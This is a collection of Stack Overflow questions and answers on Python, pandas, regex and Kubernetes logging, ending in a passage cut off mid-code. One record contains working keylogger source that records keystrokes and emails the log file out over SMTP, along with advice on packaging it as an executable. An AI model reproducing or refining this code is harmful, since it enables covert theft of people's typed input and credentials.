Q: Python split by dot and question mark, and keep the character I have a function: with open(filename,'r') as text: data=text.readlines() split=str(data).split('([.|?])') for line in split: print(line) This prints the sentences that we have after splitting a text by 2 different marks. I also want to show the split symbol in the output, this is why I use () but the split do not work fine. It returns: ['Chapter 16. My new goal. \n','Chapter 17. My new goal 2. \n'] As you can see the split haven't splitted by all dots. A: Try escaping the marks, as both symbols have functional meanings in RegEx. Also I'm quite not sure if the str.split method takes regex. maybe try it with split from Python's "re" module. [\.|\?] A: There are a few distinct problems, here. 1. read vs readlines data = text.readlines() This produces a list of str, good. ... str(data) ... If you print this, you will see it contains several characters you likely did not want: [, ', ,, ]. You'd be better off with just data = text.read(). 2. split on str vs regex str(data).split('([.|?])') We are splitting on a string, ok. Let's consult the fine documents. Return a list of the words in the string, using sep as the delimiter string. Notice there's no mention of a regular expression. That argument does not appear as sequence of seven characters in the source string. You were looking for a similar function: https://docs.python.org/3/library/re.html#re.split 3. char class vs alternation We can certainly use | vertical bar for alternation, e.g. r"(cat|dog)". It works for shorter strings, too, such as r"(c|d)". But for single characters, a character class is more convenient: r"[cd]". It is possible to match three characters, one of them being vertical bar, with r"[c|d]" or equivalently r"[cd|]". A character class can even have just a single character, so r"[c]" is identical to r"c". 4. escaping Since r".*" matches whole string, there are certainly cases where escaping dot is important, e.g. r"(cat|dog|\.)". We can construct a character class with escaping: r"[cd\.]". Within [ ] square brackets that \ backwhack is optional. Better to simply say r"[cd.]", which means the same thing. pattern = re.compile(r"[.?]") 5. findall vs split The two functions are fairly similar. But findall() is about retrieving matching elements, which your "preserve the final punctuation" requirement asks for, while split() pretty much assumes that the separator is uninteresting. So findall() seems a better match for your use case. pattern = re.compile(r"[^.?]+[.?]") Note that ^ caret usually means "anchor to start of string", but within a character class it is negation. So e.g. r"[^0-9]" means "non-digit". data = text.readlines() split = str(data).split('([.|?])') Putting it all together, try this: data = text.read() pattern = re.compile(r"[^.?]+[.?]") sentences = pattern.findall(data) If there's no trailing punctuation in the source string, the final words won't appear in the result. Consider tacking on a "." period in that case.
Python split by dot and question mark, and keep the character
I have a function: with open(filename,'r') as text: data=text.readlines() split=str(data).split('([.|?])') for line in split: print(line) This prints the sentences that we have after splitting a text by 2 different marks. I also want to show the split symbol in the output, this is why I use () but the split do not work fine. It returns: ['Chapter 16. My new goal. \n','Chapter 17. My new goal 2. \n'] As you can see the split haven't splitted by all dots.
[ "Try escaping the marks, as both symbols have functional meanings in RegEx. Also I'm quite not sure if the str.split method takes regex. maybe try it with split from Python's \"re\" module.\n[\\.|\\?]\n\n", "There are a few distinct problems, here.\n1. read vs readlines\n\n data = text.readlines()\n\n\nThis produces a list of str, good.\n\n... str(data) ...\n\n\nIf you print this, you will see it contains\nseveral characters you likely did not want: [, ', ,, ].\nYou'd be better off with just data = text.read().\n2. split on str vs regex\n\nstr(data).split('([.|?])')\n\n\nWe are splitting on a string, ok.\nLet's consult the fine documents.\n\nReturn a list of the words in the string, using sep as the delimiter string.\n\nNotice there's no mention of a regular expression.\nThat argument does not appear as sequence of seven characters in the source string.\nYou were looking for a similar function:\nhttps://docs.python.org/3/library/re.html#re.split\n3. char class vs alternation\nWe can certainly use | vertical bar for alternation,\ne.g. r\"(cat|dog)\".\nIt works for shorter strings, too, such as r\"(c|d)\".\nBut for single characters, a character class is\nmore convenient: r\"[cd]\".\nIt is possible to match three characters,\none of them being vertical bar, with r\"[c|d]\"\nor equivalently r\"[cd|]\".\nA character class can even have just a single character,\nso r\"[c]\" is identical to r\"c\".\n4. escaping\nSince r\".*\" matches whole string,\nthere are certainly cases where escaping dot is important,\ne.g. r\"(cat|dog|\\.)\".\nWe can construct a character class with escaping:\nr\"[cd\\.]\".\nWithin [ ] square brackets that \\ backwhack is optional.\nBetter to simply say r\"[cd.]\", which means the same thing.\n pattern = re.compile(r\"[.?]\")\n\n5. findall vs split\nThe two functions are fairly similar.\nBut findall() is about retrieving matching elements,\nwhich your \"preserve the final punctuation\"\nrequirement asks for,\nwhile split() pretty much assumes\nthat the separator is uninteresting.\nSo findall() seems a better match for your use case.\n pattern = re.compile(r\"[^.?]+[.?]\")\n\nNote that ^ caret usually means \"anchor\nto start of string\", but within a character class\nit is negation.\nSo e.g. r\"[^0-9]\" means \"non-digit\".\n\n\n data = text.readlines()\n split = str(data).split('([.|?])')\n\n\nPutting it all together, try this:\n data = text.read()\n pattern = re.compile(r\"[^.?]+[.?]\")\n sentences = pattern.findall(data)\n\n\nIf there's no trailing punctuation in the source string,\nthe final words won't appear in the result.\nConsider tacking on a \".\" period in that case.\n" ]
[ 0, 0 ]
[]
[]
[ "python", "split" ]
stackoverflow_0074575458_python_split.txt
Q: With Python, I want to add the last two values of a string but I want to keep double digit numbers together and not include spaces in the string index I need to create a fibonacci sequence (k = 5, until 5 elements are in the sequence) from an original string containing two starting values. While calling the last two elements in the string forward (newnumber= old[-1] + old[-2]) I pull the number "5" and what seems to be a "black space". Is there a way to lift the integers in the original sequence above the type of black spaces to make it easier to manipulate the useful data I need? Below is my code for reference. ORIGINAL STRING IN FIRST FILE: 31 5 with open("C:\\Users\\dylan\\Downloads\\rosalind_fib.txt", "r") as old: old = old.read() ## An attempt to make the numbers the only elemenet, this did not work --> old = list(old) new = open("C:\\Users\\dylan\\Downloads\\new.txt", "w") ## to test the values for each index --> print(old[###]) while len(old) < 6: newnumber= old[-1] + old[-2] old += newnumber if len(old) == 6: break new.write(old) new.close() print(new) The desired output is: 31 5 36 41 77 A sequence of 5 numbers where the sum of the last two numbers in the sequence is the new number added to the end of sequence. A: Use split() to split the string on whitespace. When you write it back out you can use join() to turn the list of numbers back into a string. with open('old.txt') as f: nums = [int(n) for n in f.read().strip().split()] while len(nums) < 5: nums.append(nums[-2] + nums[-1]) with open('new.txt', 'w') as f: f.write(' '.join(str(n) for n in nums)) Result: >echo 31 5 > old.txt >cat old.txt 31 5 >python test.py >cat new.txt 31 5 36 41 77 Breaking down how we read the file a bit: the first thing we do is read() the file, giving us a string: >>> with open ("old.txt") as f: ... contents = f.read() ... >>> contents '31 5 \n' We want to strip the contents to get rid of the trailing whitespace (otherwise when we split later we'll have an empty string at the end): >>> contents.strip() '31 5' and then we split() that to produce a list: >>> contents.strip().split() ['31', '5'] and we can iterate over that in a list comprehension to get a list of ints: >>> [int(n) for n in contents.strip().split()] [31, 5]
With Python, I want to add the last two values of a string but I want to keep double digit numbers together and not include spaces in the string index
I need to create a fibonacci sequence (k = 5, until 5 elements are in the sequence) from an original string containing two starting values. While calling the last two elements in the string forward (newnumber= old[-1] + old[-2]) I pull the number "5" and what seems to be a "black space". Is there a way to lift the integers in the original sequence above the type of black spaces to make it easier to manipulate the useful data I need? Below is my code for reference. ORIGINAL STRING IN FIRST FILE: 31 5 with open("C:\\Users\\dylan\\Downloads\\rosalind_fib.txt", "r") as old: old = old.read() ## An attempt to make the numbers the only elemenet, this did not work --> old = list(old) new = open("C:\\Users\\dylan\\Downloads\\new.txt", "w") ## to test the values for each index --> print(old[###]) while len(old) < 6: newnumber= old[-1] + old[-2] old += newnumber if len(old) == 6: break new.write(old) new.close() print(new) The desired output is: 31 5 36 41 77 A sequence of 5 numbers where the sum of the last two numbers in the sequence is the new number added to the end of sequence.
[ "Use split() to split the string on whitespace. When you write it back out you can use join() to turn the list of numbers back into a string.\nwith open('old.txt') as f:\n nums = [int(n) for n in f.read().strip().split()]\n\nwhile len(nums) < 5:\n nums.append(nums[-2] + nums[-1])\n\nwith open('new.txt', 'w') as f:\n f.write(' '.join(str(n) for n in nums))\n\nResult:\n>echo 31 5 > old.txt\n\n>cat old.txt\n31 5\n\n>python test.py\n\n>cat new.txt\n31 5 36 41 77\n\nBreaking down how we read the file a bit: the first thing we do is read() the file, giving us a string:\n>>> with open (\"old.txt\") as f:\n... contents = f.read()\n...\n>>> contents\n'31 5 \\n'\n\nWe want to strip the contents to get rid of the trailing whitespace (otherwise when we split later we'll have an empty string at the end):\n>>> contents.strip()\n'31 5'\n\nand then we split() that to produce a list:\n>>> contents.strip().split()\n['31', '5']\n\nand we can iterate over that in a list comprehension to get a list of ints:\n>>> [int(n) for n in contents.strip().split()]\n[31, 5]\n\n" ]
[ 0 ]
[]
[]
[ "fibonacci", "python", "rosalind" ]
stackoverflow_0074576106_fibonacci_python_rosalind.txt
Q: Python .exe keylogger file not sending email I created a keylogger which captures keystrokes and sends the keystrokes file to an email address specified. The python script when run from VS code terminal works perfectly, but when I compiled the files into an executable(.exe) using nuitka and execute the .exe file by double-clicking on the .exe file, the keylogger captures the keystrokes but does not send the email. What can I do to fix this? from pynput.keyboard import Listener, Key from decrypt import decrypt from encrypt import encrypt from sendoulook import send_mail decrypt() count = 0 def on_press(key): global count letter = str(key) letter = letter.replace("'","") special_keys(letter) count += 1 if count == 10000000: return False def special_keys(letter): if letter == "Key.space": letter = " " if letter == "Key.enter": letter = "\n" if letter.find("Key") == -1: with open("log.txt","a") as f: f.write(letter) def on_release(key): if key == Key.esc: f = open("log.txt","a") f.write("\n") return False with Listener(on_press=on_press, on_release=on_release) as l: l.join() encrypt() try: if __name__ == "__main__": send_mail() except Exception as error: print(error) THIS IS THE CODE FOR THE sendmail() function import smtplib from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from email.mime.base import MIMEBase from email import encoders from decouple import config from retry import retry @retry((Exception), tries=3, delay=2,backoff=2) def send_mail(): if __name__ == "sendoutlook": fromaddr = "example@outlook.com" toaddr = "example@gmail.com" password = config("PASS") msg = MIMEMultipart() msg["From"] = fromaddr msg["To"] = toaddr msg["Subject"] = "Keylog Strokes" body = "This file contains the recorded keystrokes." msg.attach(MIMEText(body,"plain")) filename = "log.txt" attachment = open("log.txt","rb") p = MIMEBase("application","octet-stream") p.set_payload((attachment).read()) encoders.encode_base64(p) p.add_header("Content-Disposition","attachment;filename=%s"%filename) msg.attach(p) s = smtplib.SMTP("smtp.office365.com",587) s.starttls() s.login(fromaddr,password) text = msg.as_string() s.sendmail(fromaddr,toaddr,text) s.quit **nuitka command ** python -m nuitka --mingw64 <main.py> --standalone --onefile A: So, nuitka doesn't compile python scripts effectively, thus not allowing the .exe file to send the email specified in your code. I suggest you try pyinstaller and see if that works.
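For comparison with the Nuitka command above — if you rebuild with PyInstaller instead, as the answer below suggests, the basic one-file build is just (the script name is whatever your entry point is):
pyinstaller --onefile main.py
Note this is only the build invocation; any data files the script expects next to it (for example the .env file read by decouple) still have to be present in the directory where the .exe runs.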
Python .exe keylogger file not sending email
I created a keylogger which captures keystrokes and sends the keystrokes file to an email address specified. The python script when run from VS code terminal works perfectly, but when I compiled the files into an executable(.exe) using nuitka and execute the .exe file by double-clicking on the .exe file, the keylogger captures the keystrokes but does not send the email. What can I do to fix this? from pynput.keyboard import Listener, Key from decrypt import decrypt from encrypt import encrypt from sendoulook import send_mail decrypt() count = 0 def on_press(key): global count letter = str(key) letter = letter.replace("'","") special_keys(letter) count += 1 if count == 10000000: return False def special_keys(letter): if letter == "Key.space": letter = " " if letter == "Key.enter": letter = "\n" if letter.find("Key") == -1: with open("log.txt","a") as f: f.write(letter) def on_release(key): if key == Key.esc: f = open("log.txt","a") f.write("\n") return False with Listener(on_press=on_press, on_release=on_release) as l: l.join() encrypt() try: if __name__ == "__main__": send_mail() except Exception as error: print(error) THIS IS THE CODE FOR THE sendmail() function import smtplib from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from email.mime.base import MIMEBase from email import encoders from decouple import config from retry import retry @retry((Exception), tries=3, delay=2,backoff=2) def send_mail(): if __name__ == "sendoutlook": fromaddr = "example@outlook.com" toaddr = "example@gmail.com" password = config("PASS") msg = MIMEMultipart() msg["From"] = fromaddr msg["To"] = toaddr msg["Subject"] = "Keylog Strokes" body = "This file contains the recorded keystrokes." msg.attach(MIMEText(body,"plain")) filename = "log.txt" attachment = open("log.txt","rb") p = MIMEBase("application","octet-stream") p.set_payload((attachment).read()) encoders.encode_base64(p) p.add_header("Content-Disposition","attachment;filename=%s"%filename) msg.attach(p) s = smtplib.SMTP("smtp.office365.com",587) s.starttls() s.login(fromaddr,password) text = msg.as_string() s.sendmail(fromaddr,toaddr,text) s.quit **nuitka command ** python -m nuitka --mingw64 <main.py> --standalone --onefile
[ "So, nuitka doesn't compile python scripts effectively, thus not allowing the .exe file to send the email specified in your code. I suggest you try pyinstaller and see if that works.\n" ]
[ 0 ]
[]
[]
[ "executable", "keylogger", "nuitka", "python", "security" ]
stackoverflow_0074556880_executable_keylogger_nuitka_python_security.txt
Q: How can I drop nan(s)?
The unique values of the column are as follows:
array(['..', '0', nan, ..., '30.0378539547197', '73.3261637778593', '59.9402466154723'], dtype=object)
I use the following code to drop NaNs and None:
df[df["Country Name"].isin([None]) == False]
and it still includes the NaNs.
A: You can use .isna to check for nan.
df[~df["Country Name"].isna()]
A: Did you try this df = df.dropna() ?
A: You can probably use "dropna" method if the NaN's are in a correct format.
And if you want to do it for a particular column then, use
df["column_name"].dropna()
or
df.dropna(subset=['column_name1', 'column_name2'])
I hope this helps!!!
How can I drop nan(s)?
The unique values of the column are as follows:
array(['..', '0', nan, ..., '30.0378539547197', '73.3261637778593', '59.9402466154723'], dtype=object)
I use the following code to drop NaNs and None:
df[df["Country Name"].isin([None]) == False]
and it still includes the NaNs.
[ "You can use .isna to check for nan.\ndf[~df[\"Country Name\"].isna()]\n\n", "Did you try this df = df.dropna() ?\n", "You can probably use \"dropna\" method if the NaN's are in a correct format.\nAnd if you want to do it for a particular column then, use\ndf[\"column_name\"].dropna()\nor\ndf.dropna(subset=['column_name1', 'column_name2'])\nI hope this helps!!!\n" ]
[ 0, 0, 0 ]
[]
[]
[ "pandas", "python" ]
stackoverflow_0074575387_pandas_python.txt
Q: how to enter the user's reply message on the bot and put it in a variable
The problem here is that I want to enter data into the database via a bot, and I'm trying to retrieve the reply word for word with arrays or indexing. But what if the user wants to enter data into the name column and has a varied name that can consist of 3-4 words? Do you have a solution?
My code: (attached as an image in the original post)
I'm confused, I hope someone can help me.
A: You can assume that class and status are always a single word so take texts[-1] as status, texts[-2] as class and texts[:-2] as the name. This way if it is a name with 3-4 words then all of it will be accounted for.
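A minimal sketch of the slicing described in that answer — the sample reply text and variable names here are made up for illustration, not taken from the question:
reply = "Siti Nur Aisyah 10A active"   # hypothetical reply from the user
texts = reply.split()
status = texts[-1]               # "active"
klass = texts[-2]                # "10A"
name = " ".join(texts[:-2])      # "Siti Nur Aisyah" - the name keeps every remaining word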
how to enter the user's reply message on the bot and put it in a variable
The problem here is that I want to enter data into the database via a bot, and I'm trying to retrieve the reply word for word with arrays or indexing. But what if the user wants to enter data into the name column and has a varied name that can consist of 3-4 words? Do you have a solution?
My code: (attached as an image in the original post)
I'm confused, I hope someone can help me.
[ "You can assume that class and status are always a single word so take texts[-1] as status, texts[-2] as class and texts[:-2] as the name. This way if it is a name with 3-4 words then all of it will be accounted for.\n" ]
[ 0 ]
[]
[]
[ "bots", "py_telegram_bot_api", "python", "variables" ]
stackoverflow_0074576164_bots_py_telegram_bot_api_python_variables.txt
Q: Having an error message when trying to sort a dataset in customized list I'm using python to organize an imported csv file. the dataset I have looks like this Name Style ID 0 heels High end 1 1 sneaker Middle 0 2 top High end 3 3 skirt Low end 6 4 dress High end 4 5 sweater Low end 9 6 hat N/A. 2 .. I am trying to arrange it so that I have have the dataset sorted like this where High end, Middle and Low are all arranged first, and other styles follow Name Style ID 0 heels High end 1 1 sneaker High end 3 2 top High end 4 3 skirt Middle 0 4 dress Low end 6 5 sweater Low end 9 6 hat N/A. 2 ... I tried this code 1 sort_order = {'High End':0, 2 'Middle':1, 'Low end':2,} 3 Clothing_Df['Style'].apply(lambda x: sort_order[x]) I get an error ---> 3 Clothing_Df['Style'].apply(lambda x: sort_order[x]) TypeError: list indices must be integers or slices, not str I've also tried: 1 sortlist = ['High End':0, 2 'Middle':1, 'Low end':2,] 3 sorted(Clothing_Df['Style'], key= sortlist) returns the same Typeerror I am not sure how to best tackle this problem as it is a very large dataset and I simply need to figure out how to custom sort my data. Any help needed thank you A: use pd.Categorical to specify the order. style_list = df['Style'].unique() sort_order = sorted(style_list, key=lambda x: (x == 'High end', x == 'Middle', x == 'Low end'), reverse=True) df['Style'] = pd.Categorical(df['Style'], categories=sort_order, ordered=True) df.sort_values('Style', inplace=True) output: > df Name Style ID 0 heels High end 1 2 top High end 3 4 dress High end 4 1 sneaker Middle 0 3 skirt Low end 6 5 sweater Low end 9 6 hat N/A. 2 7 jacket Other 10
Having an error message when trying to sort a dataset in customized list
I'm using python to organize an imported csv file. the dataset I have looks like this Name Style ID 0 heels High end 1 1 sneaker Middle 0 2 top High end 3 3 skirt Low end 6 4 dress High end 4 5 sweater Low end 9 6 hat N/A. 2 .. I am trying to arrange it so that I have have the dataset sorted like this where High end, Middle and Low are all arranged first, and other styles follow Name Style ID 0 heels High end 1 1 sneaker High end 3 2 top High end 4 3 skirt Middle 0 4 dress Low end 6 5 sweater Low end 9 6 hat N/A. 2 ... I tried this code 1 sort_order = {'High End':0, 2 'Middle':1, 'Low end':2,} 3 Clothing_Df['Style'].apply(lambda x: sort_order[x]) I get an error ---> 3 Clothing_Df['Style'].apply(lambda x: sort_order[x]) TypeError: list indices must be integers or slices, not str I've also tried: 1 sortlist = ['High End':0, 2 'Middle':1, 'Low end':2,] 3 sorted(Clothing_Df['Style'], key= sortlist) returns the same Typeerror I am not sure how to best tackle this problem as it is a very large dataset and I simply need to figure out how to custom sort my data. Any help needed thank you
[ "use pd.Categorical to specify the order.\nstyle_list = df['Style'].unique()\nsort_order = sorted(style_list, key=lambda x: (x == 'High end', x == 'Middle', x == 'Low end'), reverse=True)\ndf['Style'] = pd.Categorical(df['Style'], categories=sort_order, ordered=True)\ndf.sort_values('Style', inplace=True)\n\noutput:\n> df\n\n Name Style ID\n0 heels High end 1\n2 top High end 3\n4 dress High end 4\n1 sneaker Middle 0\n3 skirt Low end 6\n5 sweater Low end 9\n6 hat N/A. 2\n7 jacket Other 10\n\n" ]
[ 0 ]
[]
[]
[ "dataframe", "pandas", "python", "sorting" ]
stackoverflow_0074576076_dataframe_pandas_python_sorting.txt
Q: use of < var < in embedded if statements I'm learning Python via Udemy and we did a coding project where you have to get a user's height and weight, calculate their BMI and print the result. In my code, for the embedded if (elif) statements, I did something like this (variable is bmi to hold the actual BMI calculation): elif 18.5 < bmi < 25 if bmi < 18.5: print(f"Your BMI is {bmi}, you are slightly underweight.") elif 18.5 < bmi < 25: print(f"Your BMI is {bmi}, you have a normal weight.") elif 25 < bmi < 30: print(f"Your BMI is {bmi}, you are slightly overweight.") Now, the instructor instead did this: elif bmi < 25. She didn't use the format < var < like I did. Now my code worked just fine from what I can tell but it was implied that there could be a potential issue using my format. Can anyone confirm/deny that my format could cause a problem under the right circumstances??? I just want to make sure I'm coding correctly. A: now, the instructor instead did this: elif bmi < 25 This is better for two reasons: You already know bmi >= 18.5 because if it were lower you would have entered the first if clause and not reached this elif test. So it's a waste of effort to test again whether for bmi > 18.5 If bmi is exactly equal to 18.5, none of your tests will match and your code will probably do something unexpected. You should be testing for bmi >= 18.5 (which again is redundant because of point 1), or including an elif clause specifically to check bmi == 18.5 if that case needs special handling.
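To make the second point concrete — a throwaway snippet, not from the thread — a BMI of exactly 18.5 slips through every branch as the code is written:
bmi = 18.5
if bmi < 18.5:
    print("underweight")    # not reached: 18.5 < 18.5 is False
elif 18.5 < bmi < 25:
    print("normal weight")  # not reached either, for the same reason
# nothing is printed, so the boundary value is silently ignored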
use of < var < in embedded if statements
I'm learning Python via Udemy and we did a coding project where you have to get a user's height and weight, calculate their BMI and print the result. In my code, for the embedded if (elif) statements, I did something like this (variable is bmi to hold the actual BMI calculation): elif 18.5 < bmi < 25 if bmi < 18.5: print(f"Your BMI is {bmi}, you are slightly underweight.") elif 18.5 < bmi < 25: print(f"Your BMI is {bmi}, you have a normal weight.") elif 25 < bmi < 30: print(f"Your BMI is {bmi}, you are slightly overweight.") Now, the instructor instead did this: elif bmi < 25. She didn't use the format < var < like I did. Now my code worked just fine from what I can tell but it was implied that there could be a potential issue using my format. Can anyone confirm/deny that my format could cause a problem under the right circumstances??? I just want to make sure I'm coding correctly.
[ "\nnow, the instructor instead did this: elif bmi < 25\n\nThis is better for two reasons:\n\nYou already know bmi >= 18.5 because if it were lower you would have entered the first if clause and not reached this elif test. So it's a waste of effort to test again whether for bmi > 18.5\n\nIf bmi is exactly equal to 18.5, none of your tests will match and your code will probably do something unexpected. You should be testing for bmi >= 18.5 (which again is redundant because of point 1), or including an elif clause specifically to check bmi == 18.5 if that case needs special handling.\n\n\n" ]
[ 4 ]
[ "x < bmi < y is perfectly fine Python code. Python will interpret it as x < bmi and bmi < y:\nhttps://www.geeksforgeeks.org/chaining-comparison-operators-python/\nHowever, as @The Photon said, your code will have a bug if you input bmi = 18.5 or 25.\nSince if, elif, ... statements are evaluated in sequence, it's better to avoid introducing bugs, and work as your intructor did (if bmi < 25, etc.), because you already know that this line of code will only execute after the previous if/elif expressions failed (like if bmi < 18.5).\n" ]
[ -1 ]
[ "python" ]
stackoverflow_0074576190_python.txt
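A short sketch of the boundary-safe chain the answer describes, so that values of exactly 18.5 or 25 still land in a branch; bmi is assumed to be already computed from the user's height and weight, and the final message is an invented placeholder rather than the course's wording.

bmi = 24.9  # assume this was computed earlier from height and weight

if bmi < 18.5:
    print(f"Your BMI is {bmi}, you are slightly underweight.")
elif bmi < 25:    # we already know bmi >= 18.5 here
    print(f"Your BMI is {bmi}, you have a normal weight.")
elif bmi < 30:    # we already know bmi >= 25 here
    print(f"Your BMI is {bmi}, you are slightly overweight.")
else:
    print(f"Your BMI is {bmi}, you are above the overweight range.")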
Q: Kubectl logs does not return any output I am trying to debug my application and I need to look the logs for my backend service. I run it with conda run and the configuration is the following: # Partir de l’image officielle de Python 3.7 FROM continuumio/miniconda3 EXPOSE 50051 # Mettre le code de l’application dans le répertoire / de l’image WORKDIR / # Copier les librairie nécessaire à votre application ADD prod-env.yml / # Installer les packages Python nécessaires dans requirements.txt RUN conda env create -f prod-env.yml --prefix ./env # Copier le code de l’application dans le répertoire / ADD src /src ENV PYTHONUNBUFFERED=1 # Lancer le script app.py quand le container démarre CMD ["conda","run", "--no-capture-output", "-v", "-v" ,"-p", "./env", "python", "-u", "-m", "src.main"] I know the kubernetes deployment is successful since I am able to send some requests and get responses, but I am trying to debug an edge case and I need the logs. The command kubectl logs backend-xxxxxxxx does not return anything. What is weird is when I try to run the container directly, I get the expected output docker run --platform linux/amd64 865959cfcf1c DEBUG conda.gateways.logging:set_verbosity(246): verbosity set to 2 DEBUG conda.gateways.subprocess:subprocess_call(85): executing>> /bin/bash /tmp/tmpxsyy9ay5 WARNING: overwriting environment variables set in the machine overwriting variable PYTHONUNBUFFERED Server started, listening on 50051 How can I get the output when the container is deployed on kubernetes ? A: I made it work by specifying to use stdout instead of stderr in the logging config. It is weird though since the doc specifies that both stderr and stdout should be logged.
Kubectl logs does not return any output
I am trying to debug my application and I need to look the logs for my backend service. I run it with conda run and the configuration is the following: # Partir de l’image officielle de Python 3.7 FROM continuumio/miniconda3 EXPOSE 50051 # Mettre le code de l’application dans le répertoire / de l’image WORKDIR / # Copier les librairie nécessaire à votre application ADD prod-env.yml / # Installer les packages Python nécessaires dans requirements.txt RUN conda env create -f prod-env.yml --prefix ./env # Copier le code de l’application dans le répertoire / ADD src /src ENV PYTHONUNBUFFERED=1 # Lancer le script app.py quand le container démarre CMD ["conda","run", "--no-capture-output", "-v", "-v" ,"-p", "./env", "python", "-u", "-m", "src.main"] I know the kubernetes deployment is successful since I am able to send some requests and get responses, but I am trying to debug an edge case and I need the logs. The command kubectl logs backend-xxxxxxxx does not return anything. What is weird is when I try to run the container directly, I get the expected output docker run --platform linux/amd64 865959cfcf1c DEBUG conda.gateways.logging:set_verbosity(246): verbosity set to 2 DEBUG conda.gateways.subprocess:subprocess_call(85): executing>> /bin/bash /tmp/tmpxsyy9ay5 WARNING: overwriting environment variables set in the machine overwriting variable PYTHONUNBUFFERED Server started, listening on 50051 How can I get the output when the container is deployed on kubernetes ?
[ "I made it work by specifying to use stdout instead of stderr in the logging config. It is weird though since the doc specifies that both stderr and stdout should be logged.\n" ]
[ 0 ]
[]
[]
[ "kubernetes", "logging", "python" ]
stackoverflow_0074564853_kubernetes_logging_python.txt
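The fix described in the answer, sending the application's log output to stdout instead of stderr, might look roughly like this with Python's standard logging module; the logger name and the format string are assumptions, not taken from the original service.

import logging
import sys

logging.basicConfig(
    stream=sys.stdout,   # the default stream would be sys.stderr
    level=logging.INFO,
    format="%(asctime)s %(levelname)s %(name)s: %(message)s",
)

logging.getLogger("backend").info("Server started, listening on 50051")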
Q: Turning keywords into lists in python dataframe columns I've extracted key words from a different column to make a new column (hard skills) that looks like this: (https://i.stack.imgur.com/XNOIK.png) But I want to make each key word into a list format within the "hards skills" column. For example, for the 1st row of "hard skills" column, my desired outcome would be: ['Python Programming', 'Machine Learning', 'Data Analysis'...] instead of Python Programming,Machine Learning,Data Analysis... This is how I filtered the key words out into the new "hard skills" column. #Filter and make new column for hard skills hard_skills = ['Python Programming', 'Statistics', 'Statistical Hypothesis Testing','Data Cleansing', 'Tensorflow', 'Machine Learning', 'Data Analysis','Data Visualization', 'Cloud Computing', 'R Programming', 'Data Science','Computer Programming', 'Deep Learning', 'Data Analysis', 'SQL', 'Regression Analysis', 'Algorithms', 'JavaScript', 'Python'] def get_hard_skills(skills): return_hard_skills = "" for hard_skill in hard_skills: if skills.find(hard_skill) >= 0: if return_hard_skills == "": return_hard_skills = hard_skill else: return_hard_skills = return_hard_skills + "," + hard_skill if return_hard_skills == "": return ('not found') else: return return_hard_skills course_name_skills['hard skills'] = "" #loop through data frame to get hard skills for i in range(0,len(course_name_skills)-1): #every single line of the data science courses skills = course_name_skills.loc[i,"skills"] if not isNaN(skills): #if not empty course_name_skills.loc[i,"hard skills"] = get_hard_skills(skills) course_name_skills = course_name_skills.replace('not found',np.NaN) only_hardskills = course_name_skills.dropna(subset=['hard skills']) Is there a way I could change the code that filtered the data frame for key words? Or is there a more efficient way? I tried strip.() or even tried my luck with return_hard_skills = "[" + return_hard_skills + "," + hard_skill + "]" But it didn't come through. [Dataframe with original column] random, but needed, true or false table generated A: IIUC, there is no need for functions and/or loops here since you can use pandas.Series.str.join to get your expected column/output : course_name_skills["hard skills"]= course_name_skills["skills"].str.join(",") NB: The line above assumes that the column hard skills holds lists, otherwise (if strings) use this : course_name_skills["hard skills"]= ( course_name_skills["skills"] .str.strip("[]") .replace({"'": "", "\s+": ""}, regex=True) ) A: df['skills'] = df['hard skills'].str.split(',').apply( lambda skills: [skill.strip() for skill in skills] ) And if you want to add filtering: skills = list(set(df['skills'].sum())) for skill in skills: df[skill] = df['skills'].apply(lambda x: skill in x) df.loc[df['Data Analysis']==True]['course_name']
Turning keywords into lists in python dataframe columns
I've extracted key words from a different column to make a new column (hard skills) that looks like this: (https://i.stack.imgur.com/XNOIK.png) But I want to make each key word into a list format within the "hards skills" column. For example, for the 1st row of "hard skills" column, my desired outcome would be: ['Python Programming', 'Machine Learning', 'Data Analysis'...] instead of Python Programming,Machine Learning,Data Analysis... This is how I filtered the key words out into the new "hard skills" column. #Filter and make new column for hard skills hard_skills = ['Python Programming', 'Statistics', 'Statistical Hypothesis Testing','Data Cleansing', 'Tensorflow', 'Machine Learning', 'Data Analysis','Data Visualization', 'Cloud Computing', 'R Programming', 'Data Science','Computer Programming', 'Deep Learning', 'Data Analysis', 'SQL', 'Regression Analysis', 'Algorithms', 'JavaScript', 'Python'] def get_hard_skills(skills): return_hard_skills = "" for hard_skill in hard_skills: if skills.find(hard_skill) >= 0: if return_hard_skills == "": return_hard_skills = hard_skill else: return_hard_skills = return_hard_skills + "," + hard_skill if return_hard_skills == "": return ('not found') else: return return_hard_skills course_name_skills['hard skills'] = "" #loop through data frame to get hard skills for i in range(0,len(course_name_skills)-1): #every single line of the data science courses skills = course_name_skills.loc[i,"skills"] if not isNaN(skills): #if not empty course_name_skills.loc[i,"hard skills"] = get_hard_skills(skills) course_name_skills = course_name_skills.replace('not found',np.NaN) only_hardskills = course_name_skills.dropna(subset=['hard skills']) Is there a way I could change the code that filtered the data frame for key words? Or is there a more efficient way? I tried strip.() or even tried my luck with return_hard_skills = "[" + return_hard_skills + "," + hard_skill + "]" But it didn't come through. [Dataframe with original column] random, but needed, true or false table generated
[ "IIUC, there is no need for functions and/or loops here since you can use pandas.Series.str.join to get your expected column/output :\ncourse_name_skills[\"hard skills\"]= course_name_skills[\"skills\"].str.join(\",\")\n\nNB: The line above assumes that the column hard skills holds lists, otherwise (if strings) use this :\ncourse_name_skills[\"hard skills\"]= (\n course_name_skills[\"skills\"]\n .str.strip(\"[]\")\n .replace({\"'\": \"\", \"\\s+\": \"\"}, regex=True)\n )\n\n", "df['skills'] = df['hard skills'].str.split(',').apply(\n lambda skills: [skill.strip() for skill in skills]\n)\n\nAnd if you want to add filtering:\nskills = list(set(df['skills'].sum()))\nfor skill in skills:\n df[skill] = df['skills'].apply(lambda x: skill in x)\n\ndf.loc[df['Data Analysis']==True]['course_name']\n\n" ]
[ 0, 0 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074576129_dataframe_pandas_python.txt
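A sketch of producing the list-valued column directly, so there is no need to join on "," and split again later; hard_skills and the column names come from the question, while the trimmed skill list and the two sample rows are made up.

import numpy as np
import pandas as pd

hard_skills = ["Python Programming", "Machine Learning", "Data Analysis", "SQL"]  # trimmed for the example

course_name_skills = pd.DataFrame({
    "course_name": ["Course A", "Course B"],
    "skills": ["Python Programming, Machine Learning and Data Analysis", "Public Speaking"],
})

def find_hard_skills(text):
    if pd.isna(text):
        return np.nan
    found = [s for s in hard_skills if s in text]
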